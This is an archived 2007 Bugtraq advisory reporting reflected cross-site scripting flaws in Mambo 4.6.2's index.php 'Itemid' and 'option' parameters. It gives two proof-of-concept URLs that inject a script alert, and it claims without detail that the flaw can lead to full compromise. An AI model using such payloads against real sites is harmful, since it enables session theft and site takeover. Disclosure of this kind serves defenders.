lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: 18 Dec 2007 13:25:29 -0000
From: beenudel1986@...il.com
To: bugtraq@...urityfocus.com
Subject: Multiple xss in mambo 4.6.2

~~~~~~~~~~~~~~~~Application : Mambo  v4.6.2~~~~~~~~~~~~~~~~

Author : Beenu Arora
website : www.darkc0de.com
Email ; beenudel1986@...il.com

Website: http://sourceforge.net/projects/mambo/


                              ---------------
			            |Multiple XSS |
                              ---------------


a.Vulnerable URL: http://localhost/mambo/index.php?option=com_frontpage&Itemid=
Parameter = Itemid

POC =http://localhost/mambo/http://localhost/index.php?option=com_frontpage&Itemid=>"><script>alert("XSS%20Successful")</script>

b. Vulnerable URL: http://www.localhost/index.php
Parameter = option

POC =http://localhost/index.php?option=>"><script>alert("XSS%20Successful")</script>&Itemid=1

some people might not get potential of xss but the attack can lead to complete compromise ( use shell)
perhaps there are two sql injection also but need to be tested . so next time:)
	~~~~~~~~~~~~~~~~~~greetz to mah friend d3 , icqbomber , baltazar~~~~~~~~~~~~~~~~~~

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ